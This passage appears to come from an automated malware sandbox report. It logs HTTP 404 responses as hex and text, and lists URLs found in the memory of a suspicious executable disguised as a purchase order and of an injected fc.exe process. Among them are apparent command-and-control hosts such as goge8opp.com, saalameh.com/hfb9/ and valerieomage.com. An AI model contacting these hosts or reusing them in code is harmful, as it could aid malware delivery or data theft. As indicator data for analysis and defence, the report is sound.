189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:46:19 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:47 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:47:00 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: fc.exe, 00000009.00000002.4153435982.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000036BC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://goge8opp.com:301
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.saalameh.com
Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.saalameh.com/hfb9/
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: fc.exe, 00000009.00000003.2332367117.0000000007598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: fc.exe, 00000009.00000002.4153435982.0000000004282000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZ
Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
